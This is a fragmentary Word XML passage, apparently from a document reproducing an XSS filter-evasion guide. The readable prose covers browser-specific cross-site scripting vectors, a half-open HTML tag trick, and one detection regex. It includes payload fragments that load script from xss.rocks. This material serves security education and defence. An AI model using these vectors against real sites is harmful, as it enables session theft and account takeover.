        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below.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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works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IE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Netscape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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode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Opera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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add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</w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="326" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="347" w:firstLine="872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5555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4445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1258" name="Group 1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614" y="7"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1259" name="Freeform 1261"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="7"/>
                            <a:ext cx="827" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2420 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 827"/>
                              <a:gd name="T2" fmla="+- 0 189 7"/>
                              <a:gd name="T3" fmla="*/ 189 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 189 7"/>
                              <a:gd name="T7" fmla="*/ 189 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 189 7"/>
                              <a:gd name="T11" fmla="*/ 189 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 168 7"/>
                              <a:gd name="T15" fmla="*/ 168 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 165 7"/>
                              <a:gd name="T19" fmla="*/ 165 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 28 7"/>
                              <a:gd name="T23" fmla="*/ 28 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 7 7"/>
                              <a:gd name="T27" fmla="*/ 7 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2420 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 7 7"/>
                              <a:gd name="T31" fmla="*/ 7 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2441 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 28 7"/>
                              <a:gd name="T35" fmla="*/ 28 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2441 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 168 7"/>
                              <a:gd name="T39" fmla="*/ 168 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2423 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 189 7"/>
                              <a:gd name="T43" fmla="*/ 189 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2420 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 189 7"/>
                              <a:gd name="T47" fmla="*/ 1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6" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="827" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="827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0" name="Text Box 1260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7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59" o:spid="_x0000_s1176" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:.35pt;width:41.35pt;height:9.15pt;z-index:-17660928;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,7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">
                <v:shape id="Freeform 1261" o:spid="_x0000_s1177" style="position:absolute;left:1614;top:7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6Ur8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/6HMAteRFMLLrZrFB+IHvZilcXj0My2&#10;xWZSmqj135uFBW/z8T1nvuxMLe7Uusqygsk4AkGcW11xoeB82o1mIJxH1lhbJgVPcrBc9HtzTLV9&#10;8JHumS9ECGGXooLS+yaV0uUlGXRj2xAH7te2Bn2AbSF1i48QbmoZR9GnNFhxaCixoU1J+TW7GQXf&#10;622R7H72/iLjczK8Xtao86NSg49u9QXCU+ff4n/3QYf58TSBv2/CC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6Ur8MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m806,182r-785,l18,182,,161r,-3l,21,21,,806,r21,21l827,161r-18,21l806,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="806,189;21,189;18,189;0,168;0,165;0,28;21,7;806,7;827,28;827,168;809,189;806,189" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1260" o:spid="_x0000_s1178" type="#_x0000_t202" style="position:absolute;left:1614;top:7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Pq+cYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzIFb7qph9CmriKlQkEoxnjocZod&#10;k8XsbMxuNf33zqHQ2wzvzXvfLNej79SVhugCG3iaZ6CI62AdNwaO1Xb2DComZItdYDLwSxHWq4fJ&#10;EgsbblzS9ZAaJSEcCzTQptQXWse6JY9xHnpi0U5h8JhkHRptB7xJuO/0Isty7dGxNLTY01tL9fnw&#10;4w1svrh8d5fP7315Kl1VvWS8y8/GTB/HzSuoRGP6N/9df1jBX+TCL9/ICHp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4Pq+c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&lt;/SCRIPT&gt;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tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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end.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>However,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especially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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t>space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issue,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course,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shorter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>domain,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better.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".j"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valid,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>regardless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encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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because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browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>knows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context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tag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11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108585</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1489075" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1255" name="Group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9075" cy="116205"/>
                          <a:chOff x="1614" y="171"/>
                          <a:chExt cx="2345" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1256" name="Freeform 1258"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="170"/>
                            <a:ext cx="2345" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3938 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2345"/>
                              <a:gd name="T2" fmla="+- 0 353 171"/>
                              <a:gd name="T3" fmla="*/ 353 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2345"/>
                              <a:gd name="T6" fmla="+- 0 353 171"/>
                              <a:gd name="T7" fmla="*/ 353 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2345"/>
                              <a:gd name="T10" fmla="+- 0 352 171"/>
                              <a:gd name="T11" fmla="*/ 352 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2345"/>
                              <a:gd name="T14" fmla="+- 0 332 171"/>
                              <a:gd name="T15" fmla="*/ 332 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2345"/>
                              <a:gd name="T18" fmla="+- 0 329 171"/>
                              <a:gd name="T19" fmla="*/ 329 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2345"/>
                              <a:gd name="T22" fmla="+- 0 192 171"/>
                              <a:gd name="T23" fmla="*/ 192 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2345"/>
                              <a:gd name="T26" fmla="+- 0 171 171"/>
                              <a:gd name="T27" fmla="*/ 171 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3938 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2345"/>
                              <a:gd name="T30" fmla="+- 0 171 171"/>
                              <a:gd name="T31" fmla="*/ 171 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3959 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2345"/>
                              <a:gd name="T34" fmla="+- 0 192 171"/>
                              <a:gd name="T35" fmla="*/ 192 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3959 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2345"/>
                              <a:gd name="T38" fmla="+- 0 332 171"/>
                              <a:gd name="T39" fmla="*/ 332 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3941 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2345"/>
                              <a:gd name="T42" fmla="+- 0 352 171"/>
                              <a:gd name="T43" fmla="*/ 352 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3938 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2345"/>
                              <a:gd name="T46" fmla="+- 0 353 171"/>
                              <a:gd name="T47" fmla="*/ 35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345" h="183">
                                <a:moveTo>
                                  <a:pt x="232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324" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2345" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2345" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2327" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232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7" name="Text Box 125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70"/>
                            <a:ext cx="234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SRC=//xss.rocks/.j&gt;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56" o:spid="_x0000_s1179" style="position:absolute;margin-left:80.7pt;margin-top:8.55pt;width:117.25pt;height:9.15pt;z-index:-15702016;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,171" coordsize="234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">
                <v:shape id="Freeform 1258" o:spid="_x0000_s1180" style="position:absolute;left:1614;top:170;width:2345;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="234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e1hsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6qYRxaauUiqCJ7Gx9DxkxyQ0&#10;Oxt31xj99a5Q8DaP9zmLVW8a0ZHztWUFb+MEBHFhdc2lgp/D5nUOwgdkjY1lUnAlD6vl4GWBmbYX&#10;/qYuD6WIIewzVFCF0GZS+qIig35sW+LIHa0zGCJ0pdQOLzHcNDJNkpk0WHNsqLClr4qKv/xsFOTv&#10;x9/9ereZuHSe3NyJb7Y7rZUaDfvPDxCB+vAU/7u3Os5PpzN4fBNP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e1hsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m2324,182l21,182r-3,-1l,161r,-3l,21,21,,2324,r21,21l2345,161r-18,20l2324,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2324,353;21,353;18,352;0,332;0,329;0,192;21,171;2324,171;2345,192;2345,332;2327,352;2324,353" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1257" o:spid="_x0000_s1181" type="#_x0000_t202" style="position:absolute;left:1614;top:170;width:234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a4MMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflil4q5sKak2zipQWhII0xoPHMTtJ&#10;FrOzaXbV9N+7BaG3ebzPyVaDbcWFem8cK3gZJyCIS6cN1wr2xefzKwgfkDW2jknBL3lYLR8fMky1&#10;u3JOl12oRQxhn6KCJoQuldKXDVn0Y9cRR65yvcUQYV9L3eM1httWTpJkJi0ajg0NdvTeUHnana2C&#10;9YHzD/OzPX7nVW6KYpHw1+yk1OhpWL+BCDSEf/HdvdFx/mQ6h79v4gl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GuDD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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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SRC=//xss.rocks/.j&gt;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Half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HTML/JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="197"/>
      </w:pPr>
      <w:r>
        <w:t>Unlike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>extra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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page,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>allow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javascript:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive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images.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useful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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>require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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bracket.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assumes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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injecting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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Even</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>though</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag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tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it.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note: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does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>up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HTML,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>depending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HTML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beneath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it.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gets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>around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</w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6051"/>
        </w:tabs>
        <w:spacing w:line="187" w:lineRule="exact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56064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1595755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3148330" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1252" name="Group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8330" cy="116205"/>
                          <a:chOff x="2513" y="1"/>
                          <a:chExt cx="4958" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1253" name="Freeform 1255"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2513" y="1"/>
                            <a:ext cx="4958" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7450 2513"/>
                              <a:gd name="T1" fmla="*/ T0 w 4958"/>
                              <a:gd name="T2" fmla="+- 0 183 1"/>
                              <a:gd name="T3" fmla="*/ 183 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2535 2513"/>
                              <a:gd name="T5" fmla="*/ T4 w 4958"/>
                              <a:gd name="T6" fmla="+- 0 183 1"/>
                              <a:gd name="T7" fmla="*/ 183 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2531 2513"/>
                              <a:gd name="T9" fmla="*/ T8 w 4958"/>
                              <a:gd name="T10" fmla="+- 0 183 1"/>
                              <a:gd name="T11" fmla="*/ 183 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2513 2513"/>
                              <a:gd name="T13" fmla="*/ T12 w 4958"/>
                              <a:gd name="T14" fmla="+- 0 162 1"/>
                              <a:gd name="T15" fmla="*/ 162 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2513 2513"/>
                              <a:gd name="T17" fmla="*/ T16 w 4958"/>
                              <a:gd name="T18" fmla="+- 0 159 1"/>
                              <a:gd name="T19" fmla="*/ 159 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2513 2513"/>
                              <a:gd name="T21" fmla="*/ T20 w 4958"/>
                              <a:gd name="T22" fmla="+- 0 22 1"/>
                              <a:gd name="T23" fmla="*/ 22 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2535 2513"/>
                              <a:gd name="T25" fmla="*/ T24 w 4958"/>
                              <a:gd name="T26" fmla="+- 0 1 1"/>
                              <a:gd name="T27" fmla="*/ 1 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7450 2513"/>
                              <a:gd name="T29" fmla="*/ T28 w 4958"/>
                              <a:gd name="T30" fmla="+- 0 1 1"/>
                              <a:gd name="T31" fmla="*/ 1 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7471 2513"/>
                              <a:gd name="T33" fmla="*/ T32 w 4958"/>
                              <a:gd name="T34" fmla="+- 0 22 1"/>
                              <a:gd name="T35" fmla="*/ 22 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7471 2513"/>
                              <a:gd name="T37" fmla="*/ T36 w 4958"/>
                              <a:gd name="T38" fmla="+- 0 162 1"/>
                              <a:gd name="T39" fmla="*/ 162 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7453 2513"/>
                              <a:gd name="T41" fmla="*/ T40 w 4958"/>
                              <a:gd name="T42" fmla="+- 0 183 1"/>
                              <a:gd name="T43" fmla="*/ 183 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7450 2513"/>
                              <a:gd name="T45" fmla="*/ T44 w 4958"/>
                              <a:gd name="T46" fmla="+- 0 183 1"/>
                              <a:gd name="T47" fmla="*/ 18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958" h="183">
                                <a:moveTo>
                                  <a:pt x="4937" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="4937" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4958" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4958" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4940" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493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" name="Text Box 1254"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2513" y="1"/>
                            <a:ext cx="495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2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/((\\%3D)|(=))\[^\\n\]\*((\\%3C)|\&lt;)\[^\\n\]+((\\%3E)|\&gt;)/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53" o:spid="_x0000_s1182" style="position:absolute;left:0;text-align:left;margin-left:125.65pt;margin-top:.05pt;width:247.9pt;height:9.15pt;z-index:-17660416;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2513,1" coordsize="4958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">
                <v:shape id="Freeform 1255" o:spid="_x0000_s1183" style="position:absolute;left:2513;top:1;width:4958;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="495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Ov0MMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwix4EU1VXKUapSqiBy9bvXgbmtm2&#10;bDMpTaz135uFBW/zeJ+z2nSmEi01rrSsYDyKQBBnVpecK7heDsMFCOeRNVaWScGTHGzWH70Vxto+&#10;+Jva1OcihLCLUUHhfR1L6bKCDLqRrYkD92Mbgz7AJpe6wUcIN5WcRNGXNFhyaCiwpl1B2W96Nwrq&#10;+S1pj3aWJOdxurcD7Y7T7UKp/meXLEF46vxb/O8+6TB/MpvC3zfhBL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yOv0MMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m4937,182l22,182r-4,l,161r,-3l,21,22,,4937,r21,21l4958,161r-18,21l4937,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4937,183;22,183;18,183;0,162;0,159;0,22;22,1;4937,1;4958,22;4958,162;4940,183;4937,183" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
